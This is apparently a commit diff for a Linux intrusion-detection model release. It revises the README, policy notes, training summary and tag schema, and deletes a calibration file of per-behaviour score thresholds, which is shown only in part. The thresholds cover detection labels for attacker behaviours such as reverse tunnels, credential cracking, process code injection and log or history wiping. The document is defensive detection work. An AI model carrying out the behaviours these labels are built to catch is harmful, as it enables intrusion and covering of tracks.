37
 
 
 
 
 
 
38
  ## Public Summary
39
 
40
  | Check | Result |
41
  | --- | ---: |
42
- | Fitted withheld Linux final-session check | 663 sessions, 365 TP, 298 TN, 0 FP, 0 FN |
43
  | 7M pressure-stream fit-check | 6,286,568 rows, 102,117 sessions, 61 alert sessions |
44
  | OOF validation | 5,747 sessions, 99.39% accuracy, 96.44% attack precision, 95.31% attack recall |
45
 
46
- The high final-session accuracy is scoped to the current fitted internal
47
  experiment. It is evidence that this L2 setup works well on the current complex
48
  internal benchmark and pressure-data fit-check, not an independent claim of
49
  general production IDS accuracy.
 
 
 
 
5
  Linux example-session scoring by default when this Hugging Face model snapshot
6
  is used as `MODEL_DIR`.
7
 
 
 
 
 
 
 
 
8
  ## Files
9
 
10
  | Path | Purpose |
11
  | --- | --- |
12
  | `logreg.joblib` | Fitted logistic-regression L2 session-risk model. |
13
+ | `tag_risk_policy.rev20.json` | Matching L2 feature policy. Its tag-selection settings are internal to L2 feature extraction. |
14
  | `train_summary.json` | Public aggregate training/evaluation summary with no raw rows or real session identifiers. |
15
 
16
  The release does not include the L2 training JSONL, raw pressure-stream archive,
17
+ full internal sessions, per-session pressure results, alert JSONL, source-code
18
  copies, or private run logs. Use the companion GitHub repository for source
19
  code and public example data.
20
 
21
  ## Scope
22
 
23
+ L2 is an experimental session scorer. A session is a sequence of events grouped
24
+ by `session_id`. L1 labels each event independently; L2 scores the whole session
25
+ by aggregating cached L1 ranked tags, retrieval scores, tag diversity, behavior
26
+ transitions, and routine-operation context.
27
 
28
  Runtime L2 does not use raw command text, user names, host names, or session ids
29
  as scoring features. Session ids may appear in private data-prep workflows for
30
  label assignment, but they are not runtime allow/deny lists.
31
 
32
+ For compatibility with the released L2 artifact, L2 derives its session
33
+ features from cached L1 `top_labels` using an internal selected-tag feature
34
+ path. This does not change L1 prediction output: users still receive ranked
35
+ `top_labels`, not a selected `behavior_tags` field.
36
+
37
  ## Public Summary
38
 
39
  | Check | Result |
40
  | --- | ---: |
41
+ | Fitted withheld Linux session benchmark | 663 sessions, 365 TP, 298 TN, 0 FP, 0 FN |
42
  | 7M pressure-stream fit-check | 6,286,568 rows, 102,117 sessions, 61 alert sessions |
43
  | OOF validation | 5,747 sessions, 99.39% accuracy, 96.44% attack precision, 95.31% attack recall |
44
 
45
+ The high session benchmark accuracy is scoped to the current fitted internal
46
  experiment. It is evidence that this L2 setup works well on the current complex
47
  internal benchmark and pressure-data fit-check, not an independent claim of
48
  general production IDS accuracy.
49
+
50
+ Use the companion GitHub helpers so feature extraction matches the released L2
51
+ artifact.
l2_artifacts/tag_risk_policy.rev20.json CHANGED
@@ -66,11 +66,10 @@
66
  "family": "persistence"
67
  }
68
  },
69
- "global_score_floor": 0.45,
70
  "max_tags_per_command": 4,
71
  "min_tag_score": 0.55,
72
  "multi_label_gap": 0.12,
73
- "notes": "Rev20 flat behavior-tag session risk policy. L1 tag selection uses the single balanced-gap path: top1 must pass calibration, then very close threshold-passing secondary labels within multi_label_gap are retained up to max_tags_per_command. Tag-level points describe intrinsic behavior risk; session-level aggregation combines evidence, diversity, routine maintenance, and professional operations context. scoring_professional_operations is a negative context signal only when professional tags are dominant, anchor evidence is present, explicit attacks are absent, and non-professional hard attack markers are absent. It is not a command or tag whitelist.",
74
  "operational_context_markers": [
75
  "cloud_identity",
76
  "identity_policy",
 
66
  "family": "persistence"
67
  }
68
  },
 
69
  "max_tags_per_command": 4,
70
  "min_tag_score": 0.55,
71
  "multi_label_gap": 0.12,
72
+ "notes": "Rev20 flat behavior-tag session risk policy. L2 derives session features from cached L1 top_labels using an internal tag-selection path that matches the released L2 model artifact. This does not change L1 prediction output: users still receive ranked top_labels, not a selected behavior_tags field. Tag-level points describe intrinsic behavior risk; session-level aggregation combines evidence, diversity, routine maintenance, and professional operations context. scoring_professional_operations is a negative context signal only when professional tags are dominant, anchor evidence is present, explicit attacks are absent, and non-professional hard attack markers are absent. It is not a command or tag whitelist.",
73
  "operational_context_markers": [
74
  "cloud_identity",
75
  "identity_policy",
l2_artifacts/train_summary.json CHANGED
@@ -1,7 +1,7 @@
1
  {
2
  "schema": "secebl_rev20_l2_public_summary_v1",
3
- "l1_run": "featurize-rev20-20260620-072423-ep128-bs112-latestdata",
4
- "l2_run": "featurize-rev20-20260620-072423-ep128-bs112-latestdata-l2hn27-lenctx-semcal-20260621",
5
  "model_type": "logistic_regression_session_scorer",
6
  "scoring_scope": "experimental fitted L2 session scorer over cached L1 semantic features",
7
  "runtime_feature_exclusions": [
@@ -30,7 +30,7 @@
30
  "fp": 15,
31
  "tn": 5306
32
  },
33
- "withheld_final_session_fit_check": {
34
  "sessions": 663,
35
  "rows_seen": 12594,
36
  "attack_sessions": 365,
 
1
  {
2
  "schema": "secebl_rev20_l2_public_summary_v1",
3
+ "l1_release": "SecEBL-Rev20 public L1 release",
4
+ "l2_release": "SecEBL-Rev20 public L2 artifact",
5
  "model_type": "logistic_regression_session_scorer",
6
  "scoring_scope": "experimental fitted L2 session scorer over cached L1 semantic features",
7
  "runtime_feature_exclusions": [
 
30
  "fp": 15,
31
  "tn": 5306
32
  },
33
+ "withheld_session_benchmark_fit_check": {
34
  "sessions": 663,
35
  "rows_seen": 12594,
36
  "attack_sessions": 365,
schema/tags_schema_rev20.json CHANGED
@@ -4,13 +4,13 @@
4
  "vocabulary_revision": 20,
5
  "status": "draft_pending_manual_reverse_review",
6
  "purpose": "Objective single-command Linux behavior recognition using one flat vocabulary of complete detection-relevant behaviors.",
7
- "model_output": {
8
  "behavior_tags": [
9
  "zero or more visible complete behavior labels"
10
  ]
11
  },
12
  "invariants": [
13
- "The model emits one flat behavior_tags array; groups exist only for vocabulary maintenance.",
14
  "Each label describes a complete visible behavior rather than a fragment that downstream code must recombine.",
15
  "Labels may combine an operation with a stable target, scope, direction, or execution form when that combination materially changes detection meaning.",
16
  "Emit the most-specific applicable behavior and suppress its generic parent behavior.",
 
4
  "vocabulary_revision": 20,
5
  "status": "draft_pending_manual_reverse_review",
6
  "purpose": "Objective single-command Linux behavior recognition using one flat vocabulary of complete detection-relevant behaviors.",
7
+ "label_row_schema": {
8
  "behavior_tags": [
9
  "zero or more visible complete behavior labels"
10
  ]
11
  },
12
  "invariants": [
13
+ "Training and evaluation label rows use one flat behavior_tags array; prediction output exposes ranked top_labels.",
14
  "Each label describes a complete visible behavior rather than a fragment that downstream code must recombine.",
15
  "Labels may combine an operation with a stable target, scope, direction, or execution form when that combination materially changes detection meaning.",
16
  "Emit the most-specific applicable behavior and suppress its generic parent behavior.",
score_calibration.rev20.json DELETED
@@ -1,1891 +0,0 @@
1
- {
2
- "axis_thresholds": {
3
- "cloud_control_plane": {
4
- "threshold": 0.6849,
5
- "tp_p50": 0.7858,
6
- "tp_samples": 3877
7
- },
8
- "configuration_and_log_modification": {
9
- "threshold": 0.5729,
10
- "tp_p50": 0.7522,
11
- "tp_samples": 3377
12
- },
13
- "containers_and_cloud_native": {
14
- "threshold": 0.6272,
15
- "tp_p50": 0.7672,
16
- "tp_samples": 7405
17
- },
18
- "database_and_infrastructure_services": {
19
- "threshold": 0.6013,
20
- "tp_p50": 0.7376,
21
- "tp_samples": 10039
22
- },
23
- "execution_and_process": {
24
- "threshold": 0.5419,
25
- "tp_p50": 0.6715,
26
- "tp_samples": 8078
27
- },
28
- "filesystem_and_data": {
29
- "threshold": 0.4651,
30
- "tp_p50": 0.5904,
31
- "tp_samples": 15305
32
- },
33
- "identity_auth_and_secrets": {
34
- "threshold": 0.6071,
35
- "tp_p50": 0.7482,
36
- "tp_samples": 5560
37
- },
38
- "kernel_memory_and_tracing": {
39
- "threshold": 0.6668,
40
- "tp_p50": 0.7787,
41
- "tp_samples": 1768
42
- },
43
- "network": {
44
- "threshold": 0.541,
45
- "tp_p50": 0.6974,
46
- "tp_samples": 20337
47
- },
48
- "observation_and_discovery": {
49
- "threshold": 0.5103,
50
- "tp_p50": 0.6811,
51
- "tp_samples": 29944
52
- },
53
- "package_build_and_source": {
54
- "threshold": 0.6235,
55
- "tp_p50": 0.7606,
56
- "tp_samples": 5751
57
- },
58
- "persistence_services_and_storage": {
59
- "threshold": 0.6133,
60
- "tp_p50": 0.7706,
61
- "tp_samples": 5651
62
- }
63
- },
64
- "counts": {
65
- "eval_rows": 82895,
66
- "labels_with_threshold": 361,
67
- "semantic_labels": 361,
68
- "sparse_labels": 0,
69
- "tp_observations": 117092
70
- },
71
- "default_threshold": 0.531,
72
- "global_floor": 0.45,
73
- "label_thresholds": {
74
- "append_system_log": {
75
- "threshold": 0.5597,
76
- "tp_p50": 0.7486,
77
- "tp_samples": 609
78
- },
79
- "apply_infrastructure_template": {
80
- "threshold": 0.6683,
81
- "tp_p50": 0.7477,
82
- "tp_samples": 139
83
- },
84
- "archive_sensitive_content": {
85
- "threshold": 0.5092,
86
- "tp_p50": 0.5666,
87
- "tp_samples": 592
88
- },
89
- "attach_multiplexer_session": {
90
- "threshold": 0.7399,
91
- "tp_p50": 0.8292,
92
- "tp_samples": 102
93
- },
94
- "attach_process_debugger": {
95
- "threshold": 0.6326,
96
- "tp_p50": 0.71,
97
- "tp_samples": 248
98
- },
99
- "attempt_remote_authentication": {
100
- "threshold": 0.5069,
101
- "tp_p50": 0.5863,
102
- "tp_samples": 631
103
- },
104
- "authenticate_cloud_cli": {
105
- "threshold": 0.6809,
106
- "tp_p50": 0.7282,
107
- "tp_samples": 123
108
- },
109
- "build_container_image": {
110
- "threshold": 0.639,
111
- "tp_p50": 0.7632,
112
- "tp_samples": 261
113
- },
114
- "build_source_code": {
115
- "threshold": 0.5956,
116
- "tp_p50": 0.7638,
117
- "tp_samples": 980
118
- },
119
- "capture_network_flows": {
120
- "threshold": 0.7264,
121
- "tp_p50": 0.7795,
122
- "tp_samples": 113
123
- },
124
- "capture_network_packets": {
125
- "threshold": 0.6213,
126
- "tp_p50": 0.8106,
127
- "tp_samples": 283
128
- },
129
- "capture_process_memory": {
130
- "threshold": 0.7009,
131
- "tp_p50": 0.802,
132
- "tp_samples": 146
133
- },
134
- "capture_process_state": {
135
- "threshold": 0.6364,
136
- "tp_p50": 0.7099,
137
- "tp_samples": 227
138
- },
139
- "change_file_ownership": {
140
- "threshold": 0.6687,
141
- "tp_p50": 0.8016,
142
- "tp_samples": 184
143
- },
144
- "change_password": {
145
- "threshold": 0.6503,
146
- "tp_p50": 0.7162,
147
- "tp_samples": 134
148
- },
149
- "clear_login_history": {
150
- "threshold": 0.692,
151
- "tp_p50": 0.7781,
152
- "tp_samples": 106
153
- },
154
- "clear_shell_history": {
155
- "threshold": 0.6478,
156
- "tp_p50": 0.7663,
157
- "tp_samples": 132
158
- },
159
- "clone_source_repository": {
160
- "threshold": 0.6837,
161
- "tp_p50": 0.8069,
162
- "tp_samples": 130
163
- },
164
- "compress_data": {
165
- "threshold": 0.5834,
166
- "tp_p50": 0.6926,
167
- "tp_samples": 430
168
- },
169
- "configure_cloud_cli": {
170
- "threshold": 0.657,
171
- "tp_p50": 0.7533,
172
- "tp_samples": 127
173
- },
174
- "connect_cloud_database": {
175
- "threshold": 0.7249,
176
- "tp_p50": 0.8119,
177
- "tp_samples": 109
178
- },
179
- "connect_external_service": {
180
- "threshold": 0.5224,
181
- "tp_p50": 0.6528,
182
- "tp_samples": 400
183
- },
184
- "connect_internal_service": {
185
- "threshold": 0.5129,
186
- "tp_p50": 0.6238,
187
- "tp_samples": 868
188
- },
189
- "connect_local_service": {
190
- "threshold": 0.5749,
191
- "tp_p50": 0.6629,
192
- "tp_samples": 173
193
- },
194
- "connect_mail_server": {
195
- "threshold": 0.6892,
196
- "tp_p50": 0.7791,
197
- "tp_samples": 124
198
- },
199
- "consume_message": {
200
- "threshold": 0.6451,
201
- "tp_p50": 0.7776,
202
- "tp_samples": 164
203
- },
204
- "crack_credential_material": {
205
- "threshold": 0.6732,
206
- "tp_p50": 0.7608,
207
- "tp_samples": 113
208
- },
209
- "create_access_token": {
210
- "threshold": 0.5892,
211
- "tp_p50": 0.6797,
212
- "tp_samples": 203
213
- },
214
- "create_archive": {
215
- "threshold": 0.4903,
216
- "tp_p50": 0.5582,
217
- "tp_samples": 1240
218
- },
219
- "create_cloud_access_key": {
220
- "threshold": 0.6997,
221
- "tp_p50": 0.8081,
222
- "tp_samples": 143
223
- },
224
- "create_cloud_compute": {
225
- "threshold": 0.76,
226
- "tp_p50": 0.8079,
227
- "tp_samples": 109
228
- },
229
- "create_cloud_identity": {
230
- "threshold": 0.6934,
231
- "tp_p50": 0.8043,
232
- "tp_samples": 125
233
- },
234
- "create_cloud_resource": {
235
- "threshold": 0.6841,
236
- "tp_p50": 0.7385,
237
- "tp_samples": 102
238
- },
239
- "create_cluster_identity": {
240
- "threshold": 0.7239,
241
- "tp_p50": 0.7737,
242
- "tp_samples": 119
243
- },
244
- "create_cluster_secret": {
245
- "threshold": 0.6945,
246
- "tp_p50": 0.8116,
247
- "tp_samples": 140
248
- },
249
- "create_container_pod": {
250
- "threshold": 0.5728,
251
- "tp_p50": 0.6787,
252
- "tp_samples": 238
253
- },
254
- "create_credential_material": {
255
- "threshold": 0.5511,
256
- "tp_p50": 0.6301,
257
- "tp_samples": 504
258
- },
259
- "create_database": {
260
- "threshold": 0.7242,
261
- "tp_p50": 0.8347,
262
- "tp_samples": 116
263
- },
264
- "create_dynamic_proxy": {
265
- "threshold": 0.6547,
266
- "tp_p50": 0.8056,
267
- "tp_samples": 130
268
- },
269
- "create_forward_tunnel": {
270
- "threshold": 0.6512,
271
- "tp_p50": 0.7743,
272
- "tp_samples": 213
273
- },
274
- "create_local_kubernetes_cluster": {
275
- "threshold": 0.7144,
276
- "tp_p50": 0.7761,
277
- "tp_samples": 127
278
- },
279
- "create_multiplexer_session": {
280
- "threshold": 0.6507,
281
- "tp_p50": 0.7863,
282
- "tp_samples": 115
283
- },
284
- "create_privileged_container": {
285
- "threshold": 0.5842,
286
- "tp_p50": 0.6388,
287
- "tp_samples": 136
288
- },
289
- "create_reverse_tunnel": {
290
- "threshold": 0.6474,
291
- "tp_p50": 0.7795,
292
- "tp_samples": 195
293
- },
294
- "create_scheduled_task": {
295
- "threshold": 0.6437,
296
- "tp_p50": 0.7858,
297
- "tp_samples": 435
298
- },
299
- "create_special_filesystem_node": {
300
- "threshold": 0.6502,
301
- "tp_p50": 0.7319,
302
- "tp_samples": 127
303
- },
304
- "create_ssh_key": {
305
- "threshold": 0.6914,
306
- "tp_p50": 0.7923,
307
- "tp_samples": 125
308
- },
309
- "create_startup_script": {
310
- "threshold": 0.6812,
311
- "tp_p50": 0.7888,
312
- "tp_samples": 108
313
- },
314
- "create_systemd_unit": {
315
- "threshold": 0.6508,
316
- "tp_p50": 0.8192,
317
- "tp_samples": 242
318
- },
319
- "create_user": {
320
- "threshold": 0.6809,
321
- "tp_p50": 0.8211,
322
- "tp_samples": 167
323
- },
324
- "decode_data": {
325
- "threshold": 0.5974,
326
- "tp_p50": 0.6861,
327
- "tp_samples": 194
328
- },
329
- "decrease_file_permission": {
330
- "threshold": 0.6328,
331
- "tp_p50": 0.8114,
332
- "tp_samples": 134
333
- },
334
- "decrypt_data": {
335
- "threshold": 0.6147,
336
- "tp_p50": 0.7404,
337
- "tp_samples": 142
338
- },
339
- "delete_audit_log": {
340
- "threshold": 0.6353,
341
- "tp_p50": 0.7633,
342
- "tp_samples": 179
343
- },
344
- "delete_business_log": {
345
- "threshold": 0.73,
346
- "tp_p50": 0.8098,
347
- "tp_samples": 132
348
- },
349
- "delete_cloud_identity": {
350
- "threshold": 0.7894,
351
- "tp_p50": 0.8372,
352
- "tp_samples": 103
353
- },
354
- "delete_cloud_resource": {
355
- "threshold": 0.7485,
356
- "tp_p50": 0.794,
357
- "tp_samples": 104
358
- },
359
- "delete_cluster_secret": {
360
- "threshold": 0.789,
361
- "tp_p50": 0.8464,
362
- "tp_samples": 133
363
- },
364
- "delete_container": {
365
- "threshold": 0.6874,
366
- "tp_p50": 0.8464,
367
- "tp_samples": 117
368
- },
369
- "delete_container_image": {
370
- "threshold": 0.7256,
371
- "tp_p50": 0.7917,
372
- "tp_samples": 110
373
- },
374
- "delete_credential_material": {
375
- "threshold": 0.6564,
376
- "tp_p50": 0.7905,
377
- "tp_samples": 349
378
- },
379
- "delete_database": {
380
- "threshold": 0.6837,
381
- "tp_p50": 0.7965,
382
- "tp_samples": 118
383
- },
384
- "delete_database_data": {
385
- "threshold": 0.6273,
386
- "tp_p50": 0.7763,
387
- "tp_samples": 140
388
- },
389
- "delete_infrastructure_log": {
390
- "threshold": 0.6904,
391
- "tp_p50": 0.8135,
392
- "tp_samples": 219
393
- },
394
- "delete_local_kubernetes_cluster": {
395
- "threshold": 0.7161,
396
- "tp_p50": 0.815,
397
- "tp_samples": 114
398
- },
399
- "delete_object_storage": {
400
- "threshold": 0.7169,
401
- "tp_p50": 0.8125,
402
- "tp_samples": 134
403
- },
404
- "delete_scheduled_task": {
405
- "threshold": 0.7464,
406
- "tp_p50": 0.8187,
407
- "tp_samples": 147
408
- },
409
- "delete_secret_store": {
410
- "threshold": 0.7269,
411
- "tp_p50": 0.7851,
412
- "tp_samples": 108
413
- },
414
- "delete_source_code": {
415
- "threshold": 0.691,
416
- "tp_p50": 0.7612,
417
- "tp_samples": 113
418
- },
419
- "delete_system_log": {
420
- "threshold": 0.6467,
421
- "tp_p50": 0.8135,
422
- "tp_samples": 245
423
- },
424
- "delete_systemd_unit": {
425
- "threshold": 0.7714,
426
- "tp_p50": 0.8278,
427
- "tp_samples": 107
428
- },
429
- "delete_user": {
430
- "threshold": 0.7637,
431
- "tp_p50": 0.8657,
432
- "tp_samples": 109
433
- },
434
- "deploy_cloud_template": {
435
- "threshold": 0.7584,
436
- "tp_p50": 0.7903,
437
- "tp_samples": 108
438
- },
439
- "destroy_infrastructure_template": {
440
- "threshold": 0.7483,
441
- "tp_p50": 0.8196,
442
- "tp_samples": 119
443
- },
444
- "disable_service": {
445
- "threshold": 0.6817,
446
- "tp_p50": 0.8133,
447
- "tp_samples": 130
448
- },
449
- "download_executable": {
450
- "threshold": 0.5748,
451
- "tp_p50": 0.6657,
452
- "tp_samples": 213
453
- },
454
- "download_external_content": {
455
- "threshold": 0.4931,
456
- "tp_p50": 0.6022,
457
- "tp_samples": 711
458
- },
459
- "download_internal_content": {
460
- "threshold": 0.5448,
461
- "tp_p50": 0.6474,
462
- "tp_samples": 431
463
- },
464
- "download_local_content": {
465
- "threshold": 0.6659,
466
- "tp_p50": 0.7478,
467
- "tp_samples": 104
468
- },
469
- "download_named_content": {
470
- "threshold": 0.5718,
471
- "tp_p50": 0.6736,
472
- "tp_samples": 162
473
- },
474
- "download_object_storage": {
475
- "threshold": 0.6075,
476
- "tp_p50": 0.6665,
477
- "tp_samples": 218
478
- },
479
- "download_script": {
480
- "threshold": 0.5612,
481
- "tp_p50": 0.6822,
482
- "tp_samples": 363
483
- },
484
- "enable_service": {
485
- "threshold": 0.6228,
486
- "tp_p50": 0.8019,
487
- "tp_samples": 268
488
- },
489
- "encode_data": {
490
- "threshold": 0.6378,
491
- "tp_p50": 0.7107,
492
- "tp_samples": 118
493
- },
494
- "encrypt_data": {
495
- "threshold": 0.5854,
496
- "tp_p50": 0.6496,
497
- "tp_samples": 173
498
- },
499
- "enumerate_cloud_accounts": {
500
- "threshold": 0.7469,
501
- "tp_p50": 0.8039,
502
- "tp_samples": 132
503
- },
504
- "enumerate_cloud_identity": {
505
- "threshold": 0.7273,
506
- "tp_p50": 0.8196,
507
- "tp_samples": 160
508
- },
509
- "enumerate_cloud_resources": {
510
- "threshold": 0.6883,
511
- "tp_p50": 0.7806,
512
- "tp_samples": 172
513
- },
514
- "enumerate_cloud_secrets": {
515
- "threshold": 0.7336,
516
- "tp_p50": 0.8529,
517
- "tp_samples": 120
518
- },
519
- "enumerate_cluster_resources": {
520
- "threshold": 0.6408,
521
- "tp_p50": 0.7959,
522
- "tp_samples": 528
523
- },
524
- "enumerate_cluster_secrets": {
525
- "threshold": 0.6719,
526
- "tp_p50": 0.8149,
527
- "tp_samples": 166
528
- },
529
- "enumerate_container_images": {
530
- "threshold": 0.6911,
531
- "tp_p50": 0.7858,
532
- "tp_samples": 117
533
- },
534
- "enumerate_containers": {
535
- "threshold": 0.6307,
536
- "tp_p50": 0.8009,
537
- "tp_samples": 183
538
- },
539
- "enumerate_database_schema": {
540
- "threshold": 0.6795,
541
- "tp_p50": 0.7982,
542
- "tp_samples": 450
543
- },
544
- "enumerate_filesystem": {
545
- "threshold": 0.5685,
546
- "tp_p50": 0.7079,
547
- "tp_samples": 1303
548
- },
549
- "enumerate_kernel_modules": {
550
- "threshold": 0.7595,
551
- "tp_p50": 0.825,
552
- "tp_samples": 110
553
- },
554
- "enumerate_listeners": {
555
- "threshold": 0.6619,
556
- "tp_p50": 0.7691,
557
- "tp_samples": 193
558
- },
559
- "enumerate_logged_in_users": {
560
- "threshold": 0.7132,
561
- "tp_p50": 0.7871,
562
- "tp_samples": 110
563
- },
564
- "enumerate_network_connections": {
565
- "threshold": 0.6908,
566
- "tp_p50": 0.7941,
567
- "tp_samples": 263
568
- },
569
- "enumerate_object_storage": {
570
- "threshold": 0.7243,
571
- "tp_p50": 0.8205,
572
- "tp_samples": 290
573
- },
574
- "enumerate_open_files": {
575
- "threshold": 0.6981,
576
- "tp_p50": 0.7901,
577
- "tp_samples": 160
578
- },
579
- "enumerate_packages": {
580
- "threshold": 0.6189,
581
- "tp_p50": 0.783,
582
- "tp_samples": 677
583
- },
584
- "enumerate_processes": {
585
- "threshold": 0.5937,
586
- "tp_p50": 0.776,
587
- "tp_samples": 979
588
- },
589
- "enumerate_scheduled_tasks": {
590
- "threshold": 0.7378,
591
- "tp_p50": 0.8023,
592
- "tp_samples": 152
593
- },
594
- "enumerate_services": {
595
- "threshold": 0.7177,
596
- "tp_p50": 0.8071,
597
- "tp_samples": 100
598
- },
599
- "enumerate_users": {
600
- "threshold": 0.6327,
601
- "tp_p50": 0.7307,
602
- "tp_samples": 123
603
- },
604
- "enumerate_workloads": {
605
- "threshold": 0.6822,
606
- "tp_p50": 0.7614,
607
- "tp_samples": 66
608
- },
609
- "execute_cloud_compute": {
610
- "threshold": 0.6317,
611
- "tp_p50": 0.6851,
612
- "tp_samples": 133
613
- },
614
- "execute_detached_process": {
615
- "threshold": 0.5426,
616
- "tp_p50": 0.6384,
617
- "tp_samples": 464
618
- },
619
- "execute_downloaded_content": {
620
- "threshold": 0.5087,
621
- "tp_p50": 0.6003,
622
- "tp_samples": 422
623
- },
624
- "execute_encoded_command": {
625
- "threshold": 0.6755,
626
- "tp_p50": 0.7586,
627
- "tp_samples": 110
628
- },
629
- "execute_from_temporary_path": {
630
- "threshold": 0.5086,
631
- "tp_p50": 0.6274,
632
- "tp_samples": 927
633
- },
634
- "execute_from_user_writable_path": {
635
- "threshold": 0.5868,
636
- "tp_p50": 0.6874,
637
- "tp_samples": 140
638
- },
639
- "execute_in_chroot": {
640
- "threshold": 0.5636,
641
- "tp_p50": 0.6283,
642
- "tp_samples": 206
643
- },
644
- "execute_in_container": {
645
- "threshold": 0.5318,
646
- "tp_p50": 0.6008,
647
- "tp_samples": 437
648
- },
649
- "execute_in_workload": {
650
- "threshold": 0.5627,
651
- "tp_p50": 0.6586,
652
- "tp_samples": 363
653
- },
654
- "execute_package_hook": {
655
- "threshold": 0.6658,
656
- "tp_p50": 0.7576,
657
- "tp_samples": 125
658
- },
659
- "execute_remote_command": {
660
- "threshold": 0.4979,
661
- "tp_p50": 0.5971,
662
- "tp_samples": 1374
663
- },
664
- "execute_scheduled_task": {
665
- "threshold": 0.6857,
666
- "tp_p50": 0.7771,
667
- "tp_samples": 125
668
- },
669
- "execute_via_dynamic_loader": {
670
- "threshold": 0.6875,
671
- "tp_p50": 0.7607,
672
- "tp_samples": 126
673
- },
674
- "execute_with_changed_identity": {
675
- "threshold": 0.5693,
676
- "tp_p50": 0.6263,
677
- "tp_samples": 187
678
- },
679
- "export_cluster_config": {
680
- "threshold": 0.6523,
681
- "tp_p50": 0.7264,
682
- "tp_samples": 123
683
- },
684
- "export_cluster_resources": {
685
- "threshold": 0.6604,
686
- "tp_p50": 0.7899,
687
- "tp_samples": 113
688
- },
689
- "export_database_dump": {
690
- "threshold": 0.588,
691
- "tp_p50": 0.7732,
692
- "tp_samples": 856
693
- },
694
- "export_ssh_key": {
695
- "threshold": 0.6655,
696
- "tp_p50": 0.7379,
697
- "tp_samples": 117
698
- },
699
- "extract_archive": {
700
- "threshold": 0.5768,
701
- "tp_p50": 0.6592,
702
- "tp_samples": 223
703
- },
704
- "fetch_remote_certificate": {
705
- "threshold": 0.6344,
706
- "tp_p50": 0.6968,
707
- "tp_samples": 178
708
- },
709
- "fetch_remote_mail": {
710
- "threshold": 0.7509,
711
- "tp_p50": 0.7796,
712
- "tp_samples": 110
713
- },
714
- "flush_cache_data": {
715
- "threshold": 0.6307,
716
- "tp_p50": 0.7261,
717
- "tp_samples": 129
718
- },
719
- "format_filesystem": {
720
- "threshold": 0.7579,
721
- "tp_p50": 0.8166,
722
- "tp_samples": 153
723
- },
724
- "generate_artifact_digest": {
725
- "threshold": 0.6133,
726
- "tp_p50": 0.7441,
727
- "tp_samples": 506
728
- },
729
- "grant_cloud_privilege": {
730
- "threshold": 0.6825,
731
- "tp_p50": 0.7921,
732
- "tp_samples": 165
733
- },
734
- "grant_cluster_privilege": {
735
- "threshold": 0.7027,
736
- "tp_p50": 0.8091,
737
- "tp_samples": 162
738
- },
739
- "grant_database_privilege": {
740
- "threshold": 0.7207,
741
- "tp_p50": 0.8461,
742
- "tp_samples": 133
743
- },
744
- "grant_infrastructure_privilege": {
745
- "threshold": 0.6554,
746
- "tp_p50": 0.73,
747
- "tp_samples": 116
748
- },
749
- "grant_user_privilege": {
750
- "threshold": 0.6376,
751
- "tp_p50": 0.7965,
752
- "tp_samples": 153
753
- },
754
- "import_database_dump": {
755
- "threshold": 0.6219,
756
- "tp_p50": 0.7356,
757
- "tp_samples": 253
758
- },
759
- "import_ssh_key": {
760
- "threshold": 0.7656,
761
- "tp_p50": 0.789,
762
- "tp_samples": 118
763
- },
764
- "increase_file_permission": {
765
- "threshold": 0.5329,
766
- "tp_p50": 0.6577,
767
- "tp_samples": 529
768
- },
769
- "initialize_infrastructure_template": {
770
- "threshold": 0.6989,
771
- "tp_p50": 0.7703,
772
- "tp_samples": 116
773
- },
774
- "inject_process_code": {
775
- "threshold": 0.6645,
776
- "tp_p50": 0.7444,
777
- "tp_samples": 105
778
- },
779
- "inspect_audit_policy": {
780
- "threshold": 0.6796,
781
- "tp_p50": 0.8039,
782
- "tp_samples": 118
783
- },
784
- "inspect_auth_policy": {
785
- "threshold": 0.6704,
786
- "tp_p50": 0.7663,
787
- "tp_samples": 190
788
- },
789
- "inspect_container_image": {
790
- "threshold": 0.6885,
791
- "tp_p50": 0.7663,
792
- "tp_samples": 229
793
- },
794
- "inspect_container_runtime": {
795
- "threshold": 0.6332,
796
- "tp_p50": 0.743,
797
- "tp_samples": 249
798
- },
799
- "inspect_current_identity": {
800
- "threshold": 0.5551,
801
- "tp_p50": 0.6526,
802
- "tp_samples": 500
803
- },
804
- "inspect_current_privileges": {
805
- "threshold": 0.6355,
806
- "tp_p50": 0.748,
807
- "tp_samples": 119
808
- },
809
- "inspect_ebpf_program": {
810
- "threshold": 0.7264,
811
- "tp_p50": 0.8048,
812
- "tp_samples": 121
813
- },
814
- "inspect_file_metadata": {
815
- "threshold": 0.5939,
816
- "tp_p50": 0.7559,
817
- "tp_samples": 1368
818
- },
819
- "inspect_firewall_policy": {
820
- "threshold": 0.7129,
821
- "tp_p50": 0.8216,
822
- "tp_samples": 447
823
- },
824
- "inspect_infrastructure_service": {
825
- "threshold": 0.572,
826
- "tp_p50": 0.7226,
827
- "tp_samples": 1301
828
- },
829
- "inspect_kernel_module": {
830
- "threshold": 0.7201,
831
- "tp_p50": 0.8277,
832
- "tp_samples": 117
833
- },
834
- "inspect_local_kubernetes_cluster": {
835
- "threshold": 0.7001,
836
- "tp_p50": 0.7735,
837
- "tp_samples": 102
838
- },
839
- "inspect_mail_queue": {
840
- "threshold": 0.7124,
841
- "tp_p50": 0.7646,
842
- "tp_samples": 114
843
- },
844
- "inspect_network_state": {
845
- "threshold": 0.7274,
846
- "tp_p50": 0.8479,
847
- "tp_samples": 955
848
- },
849
- "inspect_process_runtime_attributes": {
850
- "threshold": 0.6744,
851
- "tp_p50": 0.7603,
852
- "tp_samples": 365
853
- },
854
- "inspect_service": {
855
- "threshold": 0.6139,
856
- "tp_p50": 0.7854,
857
- "tp_samples": 685
858
- },
859
- "inspect_storage_state": {
860
- "threshold": 0.6111,
861
- "tp_p50": 0.7925,
862
- "tp_samples": 1272
863
- },
864
- "inspect_system_state": {
865
- "threshold": 0.5595,
866
- "tp_p50": 0.7152,
867
- "tp_samples": 1289
868
- },
869
- "inspect_workload": {
870
- "threshold": 0.6707,
871
- "tp_p50": 0.7906,
872
- "tp_samples": 456
873
- },
874
- "install_boot_persistence": {
875
- "threshold": 0.6708,
876
- "tp_p50": 0.7624,
877
- "tp_samples": 103
878
- },
879
- "install_package": {
880
- "threshold": 0.5951,
881
- "tp_p50": 0.7734,
882
- "tp_samples": 751
883
- },
884
- "listen_local_port": {
885
- "threshold": 0.6455,
886
- "tp_p50": 0.6996,
887
- "tp_samples": 130
888
- },
889
- "listen_network_port": {
890
- "threshold": 0.5917,
891
- "tp_p50": 0.6887,
892
- "tp_samples": 364
893
- },
894
- "load_ebpf_program": {
895
- "threshold": 0.6753,
896
- "tp_p50": 0.7496,
897
- "tp_samples": 161
898
- },
899
- "load_kernel_module": {
900
- "threshold": 0.6787,
901
